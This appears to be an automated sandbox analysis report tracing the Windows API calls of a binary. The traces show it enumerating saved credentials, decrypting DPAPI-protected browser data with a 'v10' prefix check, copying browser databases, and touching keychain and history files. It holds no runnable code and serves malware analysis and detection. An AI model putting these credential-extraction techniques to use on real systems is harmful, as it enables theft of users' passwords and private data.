                                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                  • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                  • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                  • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                  • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                  • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                                  • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                                  • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                                  • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                                  • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                                  • memset.MSVCRT ref: 0040DF5F
                                                                                                                  • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                                                  • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                                  • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                                  • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                  • API String ID: 708747863-3398334509
                                                                                                                  • Opcode ID: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                                                                  • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                                  • Opcode Fuzzy Hash: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                                                                  • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                                                                                                                  Control-flow Graph for the code at 413d4c (legend: Executed / Not Executed)
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                                                                  • memset.MSVCRT ref: 00413D7F
                                                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                  • memset.MSVCRT ref: 00413E07
                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                  • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                                                  • free.MSVCRT ref: 00413EC1
                                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                                                  • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                  • API String ID: 1344430650-1740548384
                                                                                                                  • Opcode ID: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                                                                                  • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                  • Opcode Fuzzy Hash: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                                                                                  • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                                                                                                  Control-flow Graph for the code at 40b58d (legend: Executed / Not Executed)
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?, AE,?,?,00411B78,?,General,?,00000000,00000001), ref: 0040B5A5
                                                                                                                  • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                  • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                  • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                  • String ID: AE$BIN
                                                                                                                  • API String ID: 1668488027-3931574542
                                                                                                                  • Opcode ID: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                                                                  • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                  • Opcode Fuzzy Hash: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                                                                  • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                                  APIs
                                                                                                                  • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                  • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 767404330-0
                                                                                                                  • Opcode ID: 167b13068c05feda1897cb6df0c64706ed2b4f49057c686e83d0e2c7873bd54f
                                                                                                                  • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                  • Opcode Fuzzy Hash: 167b13068c05feda1897cb6df0c64706ed2b4f49057c686e83d0e2c7873bd54f
                                                                                                                  • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                  APIs
                                                                                                                  • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                  • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: FileFind$FirstNext
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1690352074-0
                                                                                                                  • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                  • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                  • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                  • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0041898C
                                                                                                                  • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: InfoSystemmemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3558857096-0
                                                                                                                  • Opcode ID: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                                                                  • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                  • Opcode Fuzzy Hash: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                                                                  • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                  • memset.MSVCRT ref: 00406F8B
                                                                                                                  • free.MSVCRT ref: 00407082
                                                                                                                    • Part of subcall function 004069DF: memcpy.MSVCRT(Af@,?,?,00406A37,?,?,00000000,?,?,?,?,00406641,?), ref: 004069FB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: free$memcpymemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2037443186-0
                                                                                                                  • Opcode ID: 194ffa50f1d49c66bd0eaa66e239e42f462a2f09db0f56dd66ad68c16249fa33
                                                                                                                  • Instruction ID: 420730b51c6485b03e68e59ad930d3fea23228fdda059c903cb8609e0c2e012e
                                                                                                                  • Opcode Fuzzy Hash: 194ffa50f1d49c66bd0eaa66e239e42f462a2f09db0f56dd66ad68c16249fa33
                                                                                                                  • Instruction Fuzzy Hash: 54027D71D042299BDF24DF65C8846EEB7B1BF48314F1481BAE849BB381D738AE81CB55

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 004455C2
                                                                                                                  • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                  • memset.MSVCRT ref: 0044570D
                                                                                                                  • memset.MSVCRT ref: 00445725
                                                                                                                    • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                    • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                    • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                    • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                    • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                    • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                    • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                    • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                  • memset.MSVCRT ref: 0044573D
                                                                                                                  • memset.MSVCRT ref: 00445755
                                                                                                                  • memset.MSVCRT ref: 004458CB
                                                                                                                  • memset.MSVCRT ref: 004458E3
                                                                                                                  • memset.MSVCRT ref: 0044596E
                                                                                                                  • memset.MSVCRT ref: 00445A10
                                                                                                                  • memset.MSVCRT ref: 00445A28
                                                                                                                  • memset.MSVCRT ref: 00445AC6
                                                                                                                    • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                    • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                    • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                    • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                    • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                    • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                  • memset.MSVCRT ref: 00445B52
                                                                                                                  • memset.MSVCRT ref: 00445B6A
                                                                                                                  • memset.MSVCRT ref: 00445C9B
                                                                                                                  • memset.MSVCRT ref: 00445CB3
                                                                                                                  • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                  • memset.MSVCRT ref: 00445B82
                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                    • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                    • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                    • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                    • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                  • memset.MSVCRT ref: 00445986
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                                  • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                  • API String ID: 1963886904-3798722523
                                                                                                                  • Opcode ID: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                                                                  • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                  • Opcode Fuzzy Hash: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                                                                  • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                                                                    • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                    • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                                                                    • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                  • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 00412799
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004127B2
                                                                                                                  • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 004127B9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                  • String ID: $/deleteregkey$/savelangfile
                                                                                                                  • API String ID: 2744995895-28296030
                                                                                                                  • Opcode ID: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                                                                  • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                  • Opcode Fuzzy Hash: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                                                                  • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040B71C
                                                                                                                    • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                    • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                  • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                  • memset.MSVCRT ref: 0040B756
                                                                                                                  • memset.MSVCRT ref: 0040B7F5
                                                                                                                  • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                  • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                                                  • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                                  • memset.MSVCRT ref: 0040B851
                                                                                                                  • memset.MSVCRT ref: 0040B8CA
                                                                                                                  • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                                                    • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                    • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                    • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                                                  • memset.MSVCRT ref: 0040BB53
                                                                                                                  • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                                  • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateCryptDataDeleteHandleLibraryLocalProcUnprotectmemcmpmemcpywcscpy
                                                                                                                  • String ID: chp$v10
                                                                                                                  • API String ID: 1297422669-2783969131
                                                                                                                  • Opcode ID: 2d8d3858acf8204944681f745a2db0da9034132aea09d7a248e8269e324108d5
                                                                                                                  • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                  • Opcode Fuzzy Hash: 2d8d3858acf8204944681f745a2db0da9034132aea09d7a248e8269e324108d5
                                                                                                                  • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                    • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                  • free.MSVCRT ref: 0040E49A
                                                                                                                    • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                  • memset.MSVCRT ref: 0040E380
                                                                                                                    • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                    • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                  • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                  • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,76272EE0), ref: 0040E3EC
                                                                                                                  • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,76272EE0), ref: 0040E407
                                                                                                                  • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,76272EE0), ref: 0040E422
                                                                                                                  • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,76272EE0), ref: 0040E43D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                                  • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                  • API String ID: 3849927982-2252543386
                                                                                                                  • Opcode ID: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                                                                  • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                  • Opcode Fuzzy Hash: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                                                                  • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 004091E2
                                                                                                                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                  • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                  • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                  • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                                  • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                                                  • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                                  • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                                                  • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                                                  • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                                  • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                                  • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                                                  • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                                  • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3715365532-3916222277
                                                                                                                  • Opcode ID: 0b5d2420ae1e05a47c945b1ba07dbbc3733902293ebddf2e47a1979dcc9084dd
                                                                                                                  • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                  • Opcode Fuzzy Hash: 0b5d2420ae1e05a47c945b1ba07dbbc3733902293ebddf2e47a1979dcc9084dd
                                                                                                                  • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                    • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                    • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                    • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                    • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                    • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
